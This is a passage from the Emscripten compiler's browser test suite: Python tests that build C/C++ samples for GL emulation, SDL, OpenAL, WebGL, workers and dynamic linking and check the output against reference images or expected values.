self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure', '1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_test_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.compile_btest(['supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.wasm"]', '-s', 'EXPORT_ALL'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=[_one,_two]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
create_test_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(path_from_root('tests', 'test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(path_from_root('tests', 'browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
